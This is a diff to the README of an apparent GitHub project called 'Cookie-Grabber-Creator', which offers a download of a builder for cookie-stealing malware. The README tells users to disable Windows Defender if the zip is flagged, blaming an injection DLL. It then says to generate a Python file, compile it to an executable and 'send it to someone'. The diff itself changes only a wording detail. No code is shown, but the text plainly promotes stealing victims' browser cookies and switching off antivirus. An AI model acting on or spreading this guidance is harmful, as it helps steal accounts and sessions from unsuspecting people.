H4cking-Esentials/Cookie-Grabber-Creator/README.md

 ## [Download Here](https://github.com/H4cking-Esentials/Cookie-Grabber-Creator/releases/tag/release-v5-1.0.0)
 ### Instructions:
-- Download the zip (it shouldn't get flagged by defender but if it does just disable it; it's because of the injection.dll that I created most likely)
+- Download the zip (it shouldn't get flagged by windows defender but if it does just disable it; it's because of the injection.dll that I created most likely)
 - Unzip it and run the app
 - Enter your desired information and then just press create
 - After it creates you can just compile the python file into an exe and just send it to someone